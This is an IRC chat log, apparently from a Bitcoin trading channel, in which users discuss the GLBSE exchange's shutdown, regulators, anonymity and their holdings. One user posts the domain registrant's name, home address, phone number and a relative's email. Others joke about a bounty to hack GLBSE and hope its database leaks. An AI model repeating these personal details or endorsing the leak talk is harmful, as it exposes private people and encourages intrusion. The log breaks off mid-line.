GLBSE CEO at Bitcoin Conference for the whole Internet to watch. Oct 06 05:56:39 ____Atlas_____ you still allowed on the forum ? Oct 06 05:56:44 <____Atlas_____> Yep Oct 06 05:56:50 then ^^ link above. Oct 06 05:56:51 You bet he is... Oct 06 05:57:05 Lucklily all BTC-Mining funds are held by Amazingrando... Oct 06 05:57:33 Actually, most operations being mining, funds were not on GLBSE. Oct 06 05:57:37 wasn't he in distress ? Oct 06 05:57:47 Who? Oct 06 05:58:01 Amazingrando? Why would you say so? Oct 06 05:58:28 um no reason, srsly. innocent q. Oct 06 05:59:20 i just have trouble keeping up with who's left standing. Oct 06 05:59:43 <____Atlas_____> BTC-Mining, if you get your share holder info back, you'll be set Oct 06 06:00:03 Yes Oct 06 06:00:28 nefario cant get the greyhounds back I bought lol Oct 06 06:00:53 I'll probably buy out small holders, I'll have a hard time managing shares individually. Oct 06 06:01:03 If there's too many people. Oct 06 06:01:11 [MPEX] [S.MPOE] 16800 @ 0.00037354 = 6.2755 BTC [-] Oct 06 06:01:47 mircea_popescu: "BTC doesn't care about the SEC. MPEx rules!" > "BTC doesn't care about the SEC. MPEx.us!" is better Oct 06 06:02:30 I still liked GLBSE's platform however... Oct 06 06:02:34 <____Atlas_____> I understand why it costs 30 BTC to get on MPEx now Oct 06 06:02:42 <____Atlas_____> This is risky business Oct 06 06:02:46 But like I said to nefario, I found him a poor decision maker. Oct 06 06:02:53 indeed Oct 06 06:02:56 <____Atlas_____> Meh, the guy had confidence. Oct 06 06:03:06 The platform he made was nice. Oct 06 06:03:08 <____Atlas_____> He fooled me for a moment or two Oct 06 06:03:10 one would start to wonder if the companies listed on the exchanges are impervious to threat Oct 06 06:03:27 will they go after the exchange only Oct 06 06:03:32 or the peoples Oct 06 06:03:45 whoever is juiciest Oct 06 06:03:49 I think I'll know that soon enough. Oct 06 06:03:58 yeah what about the asset issuers ? Oct 06 06:03:58 <____Atlas_____> They can come after me. I wish them luck seizing my brain wallets. Oct 06 06:04:10 <____Atlas_____> I sit in prison for 20 years Oct 06 06:04:20 if they came after me Oct 06 06:04:22 <____Atlas_____> come out with my Bitcoins intact Oct 06 06:04:24 id probably pay out the asset Oct 06 06:04:26 and close it Oct 06 06:04:28 ____Atlas_____ danke Oct 06 06:04:32 They'll be worth 10000x by then Oct 06 06:04:39 lol smickles Oct 06 06:04:45 <____Atlas_____> HEY SEC Oct 06 06:04:49 <____Atlas_____> IF YOURE IN HERE Oct 06 06:04:52 <____Atlas_____> FUCCKKKK YOUUUU Oct 06 06:04:52 lol Oct 06 06:05:20 [MPEX] [S.BVPS] 450 @ 0.0027501 = 1.2375 BTC [-] Oct 06 06:05:38 y'all keep saying "glbse is illegal", but what's that really about? Oct 06 06:05:53 B0g4r7 good q. Oct 06 06:05:57 <____Atlas_____> It's about Nefario being a pussy Oct 06 06:05:59 pretty self explanatory Oct 06 06:06:03 I dont know Oct 06 06:06:09 Pretty much anything publicly traded is illegal in almost every country if not registered. Oct 06 06:06:09 Illegal by US regulatory law maybe where they're obsessed with having their fingers in everything, but that's just US... Oct 06 06:06:22 Not just the US Oct 06 06:06:29 <____Atlas_____> Does Nefario have a family? Oct 06 06:06:34 <____Atlas_____> If not, he's a pussy. Oct 06 06:06:34 yes Oct 06 06:06:34 yes Oct 06 06:06:38 <____Atlas_____> Oh nvm then Oct 06 06:06:40 free-ist country in the world o/ Oct 06 06:06:45 <____Atlas_____> I understand his fear now Oct 06 06:06:47 I don't think the participants minded or felt they were doing anything wrong. Oct 06 06:06:48 He was in China visiting his wife's relative not too long ago. Oct 06 06:06:53 all other countries are run by little girls Oct 06 06:06:57 Came back to the UK recently Oct 06 06:07:04 Or were wronged, except by scammers. Oct 06 06:07:08 He should have stayed in China forever. Oct 06 06:07:08 sup smickles Oct 06 06:07:12 <____Atlas_____> Well if I had known he was a family man Oct 06 06:07:13 But it's a free market, caveat emptor. Oct 06 06:07:14 If you want to blame someone blame pirate Oct 06 06:07:19 <____Atlas_____> I would of been out awhile back Oct 06 06:07:31 I blame the SEC. Oct 06 06:07:31 <____Atlas_____> Family men have everything to lose Oct 06 06:07:38 And also Nefario. Oct 06 06:07:44 I blame a lot of things, for a lot of things Oct 06 06:07:57 Ukto: how'r things :) Oct 06 06:08:37 I woulda returned all btc befiore speaking to a lawyer. Just sayin. Oct 06 06:08:50 B0g4r7 https://bitcointalk.org/index.php?topic=115693.0 Oct 06 06:08:52 i want your sig. Oct 06 06:08:53 Now the lawyer gets everything Oct 06 06:09:19 Nefario basically embezzled company funds Oct 06 06:09:23 Mmm, too bad my sig's not for sale. Others have tried. Oct 06 06:09:28 I like the sound of it tho. Oct 06 06:10:02 so then donate. Oct 06 06:10:12 smickles: finally doing pretty good Oct 06 06:10:55 <____Atlas_____> I deleted my gmail associated with my GLBSE account Oct 06 06:10:57 Fact. The owner of MPEX has attempted to sell NSFW photos of herself. Oct 06 06:11:00 hahaha this is pretty good Oct 06 06:11:07 lol Oct 06 06:11:10 lol Oct 06 06:11:21 Anything for a Satoshi. Oct 06 06:11:43 i think more peoplethan we realise actually hear voices in btcland. Oct 06 06:11:53 [MPEX] [F.GIGA.ETF] 25267 @ 0.00003266 = 0.8252 BTC [-] Oct 06 06:11:53 [MPEX] [F.GIGA.ETF] 21790 @ 0.0000406 = 0.8847 BTC [+] Oct 06 06:12:09 <____Atlas_____> Things whisper in my ears all the time. :X Oct 06 06:12:13 <____Atlas_____> I might be crazy Oct 06 06:12:16 <____Atlas_____> but hey Oct 06 06:12:20 [MPEX] [F.GIGA.ETF] 32030 @ 0.0000406 = 1.3004 BTC [+] Oct 06 06:12:20 <____Atlas_____> I function Oct 06 06:12:21 [MPEX] [F.GIGA.ETF] 56900 @ 0.00005676 = 3.2296 BTC [+] Oct 06 06:12:47 Its crazy. Dank Bank outlasted glbse LOL Oct 06 06:12:51 ahahaha Oct 06 06:13:10 *mindfuck Oct 06 06:13:17 So if GLBSE is doing a similar foreced exit like what was done for goat, ... how did that work? Completed already? Where? Oct 06 06:13:29 sgornick it never even begun Oct 06 06:13:37 sgornick theres a management console coming Oct 06 06:13:47 supposedly Oct 06 06:13:58 <____Atlas_____> noagendamarket: lol Oct 06 06:14:12 of course you need to give nefario lube first Oct 06 06:14:19 so he can fuck you Oct 06 06:15:12 <____Atlas_____> Pretty dang common it seems: http://www.google.com/search?client=ubuntu&channel=fs&q=ghosts+whisper+in+ear&ie=utf-8&oe=utf-8 Oct 06 06:15:16 Ukto: good to hear, especially on such a day as today Oct 06 06:17:04 Of all the security breaches that have happened, wouldn't now be the right time for GLBSE's DB to be leaked so that issuers can wind down properly? Oct 06 06:17:23 sgornick if someone would be kind enough to leak it, please sign it first. Oct 06 06:17:32 otherwise there's going to be 500 versiosn Oct 06 06:17:37 ;) I asked if genjix would lol Oct 06 06:18:18 actually probably the best outcome Oct 06 06:18:20 <____Atlas_____> Let's get a bounty to get GLBSE hacked Oct 06 06:18:30 ____Atlas_____: Hah! Oct 06 06:18:30 <____Atlas_____> /jk Oct 06 06:18:36 <____Atlas_____> That's against the law Oct 06 06:18:42 <____Atlas_____> I would never break the law Oct 06 06:18:47 <____Atlas_____> Laws are to be followed Oct 06 06:18:49 <____Atlas_____> and obey Oct 06 06:18:51 <____Atlas_____> respected Oct 06 06:18:52 <____Atlas_____> Yes Oct 06 06:19:05 btc doesn't care about the law, mpex high school football rules! Oct 06 06:19:33 fo real. Oct 06 06:19:33 nefario cant really do much if that happens Oct 06 06:20:09 burnside could probably reconstruct it lol Oct 06 06:23:38 <____Atlas_____> SEC, talk to us Oct 06 06:23:43 <____Atlas_____> Why do you hate us? Oct 06 06:23:52 <____Atlas_____> What did we ever do to you? Oct 06 06:26:34 deregulating is only okay when the GOP does it Oct 06 06:26:35 :P Oct 06 06:27:47 <____Atlas_____> bitcoinbear: These are bearish times. Oct 06 06:28:04 <____Atlas_____> Absolute bearish. Oct 06 06:28:05 yes, hence my handle Oct 06 06:28:16 but I have bean bearish for a while Oct 06 06:28:22 does it get boring ? Oct 06 06:28:38 what's boring? Oct 06 06:28:53 beingbearish Oct 06 06:29:05 not if you are actually a bear Oct 06 06:29:12 o i c Oct 06 06:29:16 <____Atlas_____> Selling at the right times Oct 06 06:29:22 <____Atlas_____> Gives a lot of pleasure Oct 06 06:31:23 So, let's just say BitFloor, which reported their hack to the FBI, has turned over its DB [don't know if they did, just listing the possibility] and GLBSE's DB has found its way to regulators. How little anonymity for Bitcoin is left? Oct 06 06:31:59 <____Atlas_____> It's a lot of IPs to go through Oct 06 06:32:06 <____Atlas_____> Same thing with emails Oct 06 06:32:06 I never used bitfloor, so that wouldn't hurt my anominity Oct 06 06:32:14 <____Atlas_____> Subpoenas take a lot of time Oct 06 06:32:15 sgornick 100% if you stick to mpex. Oct 06 06:32:23 <____Atlas_____> I say its still fairly anonymous Oct 06 06:32:30 <____Atlas_____> until government becomes efficient Oct 06 06:33:16 mircea_popescu: except eavesdroppers know what keyid is making orders, and then they know what orders from the feeds Oct 06 06:33:56 pigeons what's to stop you from following the faq ? Oct 06 06:34:06 http://polimedia.us/bitcoin/faq.html#18 Oct 06 06:34:48 that doesn't change what i said Oct 06 06:35:57 forum's offline again. what, are they running it on Windows? Oct 06 06:36:05 Reboot hourly. Oct 06 06:36:07 <____Atlas_____> which forum? Oct 06 06:36:10 talk Oct 06 06:36:11 dunno why theres no tor stock exchange yet Oct 06 06:36:13 pigeons admitting someone has been eavesdropping (how ?) Oct 06 06:36:21 they have a keyid which is completely unknown. Oct 06 06:36:23 now what ? Oct 06 06:37:33 noagendamarket there is. Oct 06 06:37:51 <____Atlas_____> http://www.youtube.com/watch?v=bLU7qU2heac&feature=related Oct 06 06:38:02 [MPEX] [S.MPOE] 3100 @ 0.00037354 = 1.158 BTC [-] Oct 06 06:38:43 well the eavesdropping we know is not difficult and happens. for example the country i live in is monitored and supposedly recorded Oct 06 06:39:16 <____Atlas_____> pigeons: The NSA records all communications going in and out of the US. What else is new? Oct 06 06:39:36 And plenty that never touch the US. Oct 06 06:39:41 pigeons but still, you could at least in theory use tor Oct 06 06:39:46 damn, just started reading the thread by Theymos about GLBSE closing. Damn. Oct 06 06:39:49 or connect from some public computor Oct 06 06:39:49 See Echelon Project. Oct 06 06:40:03 [MPEX] [S.MPOE] 13633 @ 0.00037354 = 5.0925 BTC [-] Oct 06 06:40:04 [MPEX] [S.MPOE] 33623 @ 0.00037144 = 12.4889 BTC [-] Oct 06 06:40:05 [MPEX] [S.MPOE] 14100 @ 0.00037105 = 5.2318 BTC [-] Oct 06 06:40:06 [MPEX] [S.MPOE] 19454 @ 0.00037012 = 7.2003 BTC [-] Oct 06 06:40:07 [MPEX] [S.MPOE] 59300 @ 0.0003695 = 21.9114 BTC [-] Oct 06 06:40:08 [MPEX] [S.MPOE] 54916 @ 0.00036944 = 20.2882 BTC [-] Oct 06 06:40:09 [MPEX] [S.MPOE] 13400 @ 0.00036924 = 4.9478 BTC [-] Oct 06 06:40:10 [MPEX] [S.MPOE] 25892 @ 0.00036891 = 9.5518 BTC [-] Oct 06 06:40:12 [MPEX] [S.MPOE] 38300 @ 0.00036889 = 14.1285 BTC [-] Oct 06 06:40:13 [MPEX] [S.MPOE] 40300 @ 0.00036886 = 14.8651 BTC [-] Oct 06 06:40:14 [MPEX] [S.MPOE] 56099 @ 0.00036858 = 20.677 BTC [-] Oct 06 06:40:14 [MPEX] [S.MPOE] 33900 @ 0.00036843 = 12.4898 BTC [-] Oct 06 06:40:15 [MPEX] [S.MPOE] 32600 @ 0.0003684 = 12.0098 BTC [-] Oct 06 06:40:16 [MPEX] [S.MPOE] 7339 @ 0.00036823 = 2.7024 BTC [-] Oct 06 06:40:17 [MPEX] [S.MPOE] 41000 @ 0.00036822 = 15.097 BTC [-] Oct 06 06:40:18 well using an unlinked key id is a good idea you are right Oct 06 06:40:18 [MPEX] [S.MPOE] 39100 @ 0.00036718 = 14.3567 BTC [-] Oct 06 06:40:19 [MPEX] [S.MPOE] 10059 @ 0.00036553 = 3.6769 BTC [-] Oct 06 06:40:20 [MPEX] [S.MPOE] 20669 @ 0.0003652 = 7.5483 BTC [-] Oct 06 06:40:21 [MPEX] [S.MPOE] 20969 @ 0.00036296 = 7.6109 BTC [-] Oct 06 06:40:21 <____Atlas_____> lol Oct 06 06:40:22 [MPEX] [S.MPOE] 29263 @ 0.00035988 = 10.5312 BTC [-] Oct 06 06:40:23 [MPEX] [S.MPOE] 49200 @ 0.00035987 = 17.7056 BTC [-] Oct 06 06:40:23 [MPEX] [S.MPOE] 16202 @ 0.0003594 = 5.823 BTC [-] Oct 06 06:40:24 [MPEX] [S.MPOE] 4035 @ 0.00035729 = 1.4417 BTC [-] Oct 06 06:40:25 [MPEX] [S.MPOE] 58205 @ 0.00035724 = 20.7932 BTC [-] Oct 06 06:40:26 [MPEX] [S.MPOE] 63200 @ 0.00035722 = 22.5763 BTC [-] Oct 06 06:40:26 pigeons i think it's vital. Oct 06 06:40:27 [MPEX] [S.MPOE] 20026 @ 0.00035686 = 7.1465 BTC [-] Oct 06 06:40:28 [MPEX] [S.MPOE] 49977 @ 0.00035685 = 17.8343 BTC [-] Oct 06 06:40:29 [MPEX] [S.MPOE] 53800 @ 0.0003568 = 19.1958 BTC [-] Oct 06 06:40:30 [MPEX] [S.MPOE] 12400 @ 0.00035658 = 4.4216 BTC [-] Oct 06 06:40:31 [MPEX] [S.MPOE] 42700 @ 0.00035655 = 15.2247 BTC [-] Oct 06 06:40:32 [MPEX] [S.MPOE] 3400 @ 0.00035655 = 1.2123 BTC [-] Oct 06 06:40:32 [MPEX] [S.MPOE] 40800 @ 0.00035645 = 14.5432 BTC [-] Oct 06 06:40:33 [MPEX] [S.MPOE] 21400 @ 0.00035623 = 7.6233 BTC [-] Oct 06 06:40:34 [MPEX] [S.MPOE] 20000 @ 0.00035575 = 7.115 BTC [-] Oct 06 06:40:35 [MPEX] [S.MPOE] 6134 @ 0.00035522 = 2.1789 BTC [-] Oct 06 06:40:36 o hey. end of the world Oct 06 06:40:36 [MPEX] [S.MPOE] 4000 @ 0.00035501 = 1.42 BTC [-] Oct 06 06:40:37 [MPEX] [S.MPOE] 38100 @ 0.00035498 = 13.5247 BTC [-] Oct 06 06:40:38 [MPEX] [S.MPOE] 15800 @ 0.00035447 = 5.6006 BTC [-] Oct 06 06:40:39 [MPEX] [S.MPOE] 45900 @ 0.00035418 = 16.2569 BTC [-] Oct 06 06:40:40 [MPEX] [S.MPOE] 58000 @ 0.00035372 = 20.5158 BTC [-] Oct 06 06:40:41 That's a chatty bot. It can't summarize? Oct 06 06:40:41 [MPEX] [S.MPOE] 372805 @ 0.00035 = 130.4818 BTC [-] Oct 06 06:40:44 but if it ever gets linked to you, all your trade history is known to the eavesdroppers from timing correlation of trades Oct 06 06:41:04 pigeons if you always use the same system to trade, or at any rate one he can eavesdrop Oct 06 06:41:09 .0035, not nearly the end Oct 06 06:41:13 but can they follow tor ? Oct 06 06:41:30 it's possible, but not likey given the cost Oct 06 06:41:33 iirc Oct 06 06:41:36 right. Oct 06 06:42:02 anyway, glad i always register my securites Oct 06 06:42:07 so a combo of tor + whatever public libraries you have around should pretty much make you as anon as practically useful. Oct 06 06:42:56 pigeons in practical terms it'd prolly be cheaper for them to break into the server and get the db than to futz with correlating trades over an extended period of timne Oct 06 06:43:27 yeah i'd just send a girl to your house Oct 06 06:43:44 [MPEX] [S.MPOE] 60714 @ 0.00035 = 21.2499 BTC [-] Oct 06 06:43:45 [MPEX] [S.MPOE] 39286 @ 0.00035 = 13.7501 BTC [-] Oct 06 06:44:17 https://glbse.com/ Oct 06 06:44:23 o is it back ? Oct 06 06:44:25 Update, update, update... Oct 06 06:44:36 No, official close down notice... Oct 06 06:44:52 god damnit Oct 06 06:44:58 "We will do everything in our power to make the process of moving off GLBSE as smooth as possible" Oct 06 06:44:58 Silly mircea, I though theymos made it quite clear. Oct 06 06:45:00 lol that's cute. Oct 06 06:45:02 No talk of the dreaded "papers" Oct 06 06:45:12 BTC-Mining i guess that shows you how much trust i put in theymos. Oct 06 06:45:23 eh, yeah Oct 06 06:45:26 that's better than expected. provided people actually get the btc and asset accountings Oct 06 06:45:36 "We will begin retuning bitcoin once we have recieved all coins from the GLBSE treasurer that manages the GLBSE cash reserves." Oct 06 06:45:40 We will begin retuning bitcoin once we have recieved all coins from the GLBSE treasurer that manages the GLBSE cash reserves. Oct 06 06:45:42 gonna squeeze Theymos? Oct 06 06:45:43 this is a nice dig. Oct 06 06:45:50 lol oops double post Oct 06 06:45:58 pigeons you are correct. Oct 06 06:46:27 Well this is gonna be annoying... Oct 06 06:46:28 *sigh* Oct 06 06:46:43 <____Atlas_____> http://www.youtube.com/watch?feature=player_detailpage&v=5gwhHCtPZpc Oct 06 06:46:45 So they say they are returning funds right away, will we be able to log in and give a bitcoin address? Oct 06 06:47:15 apparently and apparently said info will be sent to asset managers Oct 06 06:47:22 Doesn't say anything about photo id. Oct 06 06:47:32 not yet Oct 06 06:47:39 As far as I know Oct 06 06:47:41 there is a new statement on glbse.com Oct 06 06:48:09 As of today the earliest estimated time that coins can begin moving is Friday, Oct 12th. Oct 06 06:48:09 <____Atlas_____> "we are awaiting compliance with this order" Oct 06 06:48:13 <____Atlas_____> "with this order" Oct 06 06:48:15 <____Atlas_____> "order" Oct 06 06:48:28 Way to shift the blame. Oct 06 06:48:30 Page was cached .. had to hit Reload .. Oct 06 06:48:32 so nefario is giving theymos a scammer tag on glbse.com Oct 06 06:48:35 /responsibility Oct 06 06:48:36 and vice-versa on btctalk Oct 06 06:48:48 lol Oct 06 06:49:32 Only one tag will see the light of day. Oct 06 06:50:57 My BTC still have not moved out of the glbse cold wallet. Oct 06 06:51:15 (nor any others) Oct 06 06:51:17 ONE TAG TO RULE THEM ALL Oct 06 06:52:08 Current balance is 674.04804691 BTC Oct 06 06:52:43 kinda...puny. Oct 06 06:52:49 i was thinking ~2k not 500 ffs. Oct 06 06:53:01 yea, pirate made out way better. Oct 06 06:53:05 ;;ident B0g4r7 Oct 06 06:53:05 Nick 'B0g4r7', with hostmask 'B0g4r7!~b0g4r7@h-98-134-26-221.ip.alltel.net', is not identified. Oct 06 06:53:11 in terms of amount thefted. Oct 06 06:53:36 How do I identify on this thing anyway. I guess it;s not the nickserv identify. Oct 06 06:53:37 ? Oct 06 06:53:58 I know, RTFM... Oct 06 06:54:00 no you id with gribble Oct 06 06:54:08 ;;eauth name Oct 06 06:54:17 you can just tell me, i trust you Oct 06 06:56:01 ____Atlas_____: http://youtu.be/LbObIAIR3sA?t=5m12s Oct 06 06:56:09 Is the rating system separate per channel? Oct 06 06:56:09 SO THAT'S WHERE HE WAS HIDING! Oct 06 06:56:27 B0g4r7 nope Oct 06 06:57:03 http://trust.bitcoin-otc.com/ So I can follow this guide and it will work here? Oct 06 06:57:19 <____Atlas_____> Hahaha Oct 06 06:57:23 <____Atlas_____> I love this mod so much Oct 06 06:58:20 i never played original Deus Ex Oct 06 06:58:35 <____Atlas_____> It's alright until you get to Hong Kong Oct 06 06:58:51 <____Atlas_____> It's like they gave up on being entertaining midway Oct 06 06:59:17 ;;guide Oct 06 06:59:17 Error: "guide" is not a valid command. Oct 06 07:00:32 B0g4r7 yup\ Oct 06 07:01:37 <____Atlas_____> http://www.youtube.com/watch?feature=player_detailpage&v=5gwhHCtPZpc#t=539s Oct 06 07:01:58 this is like youtube poop meets squirrel king Oct 06 07:02:21 ;;guide #bitcoin-otc Oct 06 07:02:21 Error: "guide" is not a valid command. Oct 06 07:02:28 chan specific :P Oct 06 07:03:18 PKI huh...I'd thought this all lived within IRC. Oct 06 07:03:23 B0g4r7: most of the commands work wherever gribble is Oct 06 07:03:33 ;;gettrust B0g4r7 Oct 06 07:03:33 Trust relationship from user smickles to user B0g4r7: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=smickles&dest=B0g4r7 Oct 06 07:03:33 wait Oct 06 07:03:36 wrong person Oct 06 07:03:51 i'm thinking of Oct 06 07:03:55 Peter Chimera Oct 06 07:03:57 I found I can /msg gribble. Oct 06 07:04:04 indeed Oct 06 07:04:13 cuts out gribble spam Oct 06 07:04:16 so does: Oct 06 07:04:18 ;;roulette Oct 06 07:04:19 *click* Oct 06 07:04:23 ;D Oct 06 07:04:55 ;;roulette Oct 06 07:04:55 *click* Oct 06 07:05:10 So yeah, I bought 534 Gigamining shares for about 16 BTC apparently. Oct 06 07:05:24 ;;roulette Oct 06 07:05:25 *click* Oct 06 07:05:30 .py 16/534.0 Oct 06 07:05:31 0.0299625468165 Oct 06 07:05:38 Better go kill myself now Oct 06 07:05:41 ;;roulette Oct 06 07:05:42 *click* Oct 06 07:05:46 over 16 btc ?! lol Oct 06 07:05:46 !ticker f.giga.etf Oct 06 07:05:48 :( Oct 06 07:05:48 [MPEX:F.GIGA.ETF] 1day: 0.00002002 / 0.00011046 / 0.00028006 (1103574 shares, 121.90 BTC), 30day: 0.00002002 / 0.00042347 / 0.00087369 (12060030 shares, 5,107.12 BTC) Oct 06 07:06:03 Roulette's based on a six-shooter? Oct 06 07:06:08 B0g4r7 ya Oct 06 07:06:09 yup Oct 06 07:06:14 but a theoretical one Oct 06 07:06:19 Am I feeling lucky? Oct 06 07:06:21 ;;roulette Oct 06 07:06:21 *BANG* Hey, who put a blank in here?! Oct 06 07:06:24 are there other stock exchanges? Oct 06 07:06:26 mircea_popescu: how many giga in the etf? Oct 06 07:06:35 Whew, barely lucky. Oct 06 07:06:37 smickles about 1k give or take Oct 06 07:06:44 blank is unnacceptable Oct 06 07:06:49 ;;roulette Oct 06 07:06:49 Around 1k, I got 534 Oct 06 07:06:49 *click* Oct 06 07:06:50 boonies4u ++ Oct 06 07:06:59 boonies4u: it's 'cause he's not an op right now Oct 06 07:07:05 BTC-Mining did you have a large buy in ? Oct 06 07:07:07 awww 3: Oct 06 07:07:13 Yes Oct 06 07:07:22 fridge: use /topic Oct 06 07:07:22 at ~ 0.00002000 Oct 06 07:07:27 there's a whole list Oct 06 07:07:36 Seriously, I bought 534000 F.GIGA.ETF out of 1000000 for around 16 BTC Oct 06 07:07:43 kakobrekla prolly time to kick glbse off topic ? Oct 06 07:08:00 BTC-Mining so if it ever comes back you've made like what, 400 btc or so Oct 06 07:08:14 ya kako, get with the times already you dirty hippy Oct 06 07:08:24 More like 300 Oct 06 07:08:27 but yeah Oct 06 07:08:40 good bet BTC-Mining Oct 06 07:08:47 If issuers get a list of holders, I get a lot. Oct 06 07:09:21 <____Atlas_____> ;;ticker Oct 06 07:09:22 Best bid: 12.6871, Best ask: 12.7, Bid-ask spread: 0.01290, Last trade: 12.6871, 24 hour volume: 27802, 24 hour low: 12.51, 24 hour high: 12.89999 Oct 06 07:09:33 and maybe mircea will actually pay me back my ASICMINER shares =/ Oct 06 07:09:37 Notice I said barely lucky, not incredibly lucky, because: http://www.wired.com/wiredscience/2012/08/st_essay_close_calls/ Oct 06 07:09:43 But according to our contract... Oct 06 07:09:55 <____Atlas_____> Contracts are always honored Oct 06 07:10:02 what he said. Oct 06 07:10:11 The "glbse.com" domain is owned by Oct 06 07:10:11 James McCarthy, White Rock Cottage, Hacketstown, Carlow, IE. Oct 06 07:10:11 +353.13870661095 Oct 06 07:10:11 That's a real house in Ireland, owned by Frances Hackett, email "mccarthyfrances@gmail.com". Oct 06 07:10:13 Yes, but it will be hard to set a price for them to pay the 1% monthly for borrowing them to short. Oct 06 07:10:21 apparently this was all over old threads. Oct 06 07:10:26 https://bitcointalk.org/index.php?topic=46486.msg557843#msg557843 Oct 06 07:10:49 BTC-Mining not really that hard : Oct 06 07:10:50 1% of average price of ASICMINER during the 5 days prev Oct 06 07:10:50 ious as reported by GLBSE, except should there be no trades during the previous Oct 06 07:10:50 five days he shall pay nothing on this count ; Oct 06 07:11:19 Ah, true, I forgot GLBSE was mentioned. Oct 06 07:11:30 I only recalled 5 days average of trades. Oct 06 07:11:38 And assumed if it traded non-publicly... Oct 06 07:11:48 Eh Oct 06 07:11:54 <____Atlas_____> Nefario put his real name on the domain... Oct 06 07:11:55 even so it'd be insanely difficult to prove. Oct 06 07:11:58 i mean... Oct 06 07:12:47 Yes, that's what I was thinking. Oct 06 07:13:06 Although since it's as reported as GLBSE or pay nothing then I guess we're all set for that. Oct 06 07:13:33 you get a 1btc on 19.12 tho Oct 06 07:13:37 [MPEX] [S.MPOE] 65200 @ 0.00036639 = 23.8886 BTC [+] Oct 06 07:15:06 That clause however does not require the asset to be traded on GLBSE. Oct 06 07:15:49 So if shares are still trading, I'd expect to get them back. Although it might be hard to find a seller without GLBSE. Oct 06 07:15:49 "except if ASICMINER should have become disconti Oct 06 07:15:49 nued or are no longer traded" ? Oct 06 07:16:02 [MPEX] [S.MPOE] 3435 @ 0.00036375 = 1.2495 BTC [-] Oct 06 07:16:03 [MPEX] [S.MPOE] 32168 @ 0.00036903 = 11.871 BTC [+] Oct 06 07:16:05 [MPEX] [S.MPOE] 52000 @ 0.0003696 = 19.2192 BTC [+] Oct 06 07:16:05 I said if shares are still trading. Oct 06 07:16:06 [MPEX] [S.MPOE] 12397 @ 0.00037389 = 4.6351 BTC [+] Oct 06 07:16:06 [MPEX] [S.MPOE] 18469 @ 0.00037408 = 6.9089 BTC [+] Oct 06 07:16:07 [MPEX] [S.MPOE] 6300 @ 0.0003749 = 2.3619 BTC [+] Oct 06 07:16:08 [MPEX] [S.MPOE] 41328 @ 0.00037492 = 15.4947 BTC [+] Oct 06 07:16:09 [MPEX] [S.MPOE] 33903 @ 0.00037508 = 12.7163 BTC [+] Oct 06 07:16:23 o hey, this is an interesting point of contention. Oct 06 07:16:24 Either non-publicly or moved to a new exchange. Oct 06 07:16:41 i'd say that with the dissapearance of glbse, "ASICMINER" as referenced is no longer trading. Oct 06 07:16:55 well non-publicly is trading ? Oct 06 07:17:28 Well yes, it states trading, not publicly trading. It would also not be discontinued. Oct 06 07:17:38 Simply delisted from GLBSE due to it's closure. Oct 06 07:17:54 hm. Oct 06 07:17:58 A stock exchange going away/delisting assets does not void said assets. Oct 06 07:18:30 Eh, considering everyone who'll want to sell their hard to trade shares, they'll probably be cheaper to acquire than if GLBSE was still around. Oct 06 07:18:32 but in order for them to be trading they do have to be.. trading Oct 06 07:19:15 Yes... let's see about that if anything actually happens for issuers to manage the assets outside GLBSE. Oct 06 07:19:21 yeah. Oct 06 07:23:53 wow it's been three minutes of quiet Oct 06 07:23:57 why is bitcoin so boring now. Oct 06 07:24:08 i know someone somewhere was hacked. Oct 06 07:24:18 Sad thing tho, telling my curious relatives what I was doing and my numbers (I was making a hefty profit trading on GLBSE with the constant price swings), kind of got them interested in it. Oct 06 07:25:01 My young sister ended getting funds on GLBSE the day before it closed. Oct 06 07:25:10 :o Oct 06 07:25:11 Interesting enough for you mircea? Oct 06 07:25:30 Aye, kept telling it's damn too risky. Oct 06 07:25:39 haha smart woman. Oct 06 07:25:42 And didn't like the idea. Oct 06 07:25:43 how old is she ? Oct 06 07:25:56 Still studying. Oct 06 07:26:01 inb4 pics Oct 06 07:26:11 smickles i thought you were married Oct 06 07:26:29 I am, don't you know what inb4 means? Oct 06 07:26:43 that you're about to ask for pix :D Oct 06 07:26:46 .o ud inb4 Oct 06 07:26:49 Generally used on internet forums, inb4 refers to a user posting a reply to a message/topic "before" another user posts an obvious response. When used appropriately, inb4 is followed by a word or shor Oct 06 07:27:03 "before" _another user_ Oct 06 07:27:20 ;P Oct 06 07:27:27 :D Oct 06 07:27:51 Hey, she doesn't have much money at all either, you know students. Oct 06 07:28:00 wait, this is ambiguous Oct 06 07:28:08 did she get her money OFF glbse or had she just deposited ? Oct 06 07:28:09 I don't even know how much she deposited, I'll have to call her. Oct 06 07:28:33 [00:25] My young sister ended getting funds on GLBSE the day before it closed. Oct 06 07:28:45 ended getting funds = just deposited ? Oct 06 07:28:45 Notice the "gettings funds on GLBSE" part Oct 06 07:28:48 a ok. Oct 06 07:28:52 well then allow me to change my plea! Oct 06 07:28:55 yes, just deposited. Oct 06 07:28:59 s/smart woman/poor girl/ Oct 06 07:29:28 I would probably have ended up managing the BTC however. Oct 06 07:30:18 did she deposit more than usagi ? Oct 06 07:30:34 I doubt so... how much did Usagi deposit? Oct 06 07:31:24 i dunno, like 200 was saying ? Oct 06 07:31:34 Wow, not much... Oct 06 07:31:40 So then maybe, yes. Oct 06 07:32:59 <____Atlas_____> I like how usagi is gone Oct 06 07:33:19 He went drunk, or at least a bit like goat. Oct 06 07:33:40 Posting oddly forumlated text and being incoherent. Oct 06 07:33:54 <____Atlas_____> lol Oct 06 07:34:08 <____Atlas_____> This is starting to feel insane in general though Oct 06 07:34:17 It does... Oct 06 07:34:49 Couldn't have been much. Their last sweep into the cold wallet on Oct 4th totaled 165 BTC and change. Oct 06 07:34:56 Also, what will I do if I can't trade on the large price swings and price difference from GLBSE? Oct 06 07:35:15 <____Atlas_____> You might want to consider making an independent stock exchange Oct 06 07:35:20 <____Atlas_____> using open transactions Oct 06 07:35:24 <____Atlas_____> in Russia or China Oct 06 07:35:41 On the moon or in orbit maybe. Oct 06 07:35:46 Not long before going back to the UK for the bitcoin conference Oct 06 07:35:59 Nefario was in China visiting his wife's relatives. Oct 06 07:36:00 lol Oct 06 07:36:04 Should have stayed there Oct 06 07:36:07 Forever Oct 06 07:36:09 or, as ppl have been saying a lot, on tor. Oct 06 07:36:15 have a series of drones keep the server airborn in internationaly territory Oct 06 07:36:17 Yes Oct 06 07:36:29 drones? Oct 06 07:36:39 Sounds good. Kinda like the riverboat casinos. Oct 06 07:36:40 those quad-copter things Oct 06 07:36:51 Make a freakin' floating fortress you mean! Oct 06 07:36:52 And gliders and balloons. Oct 06 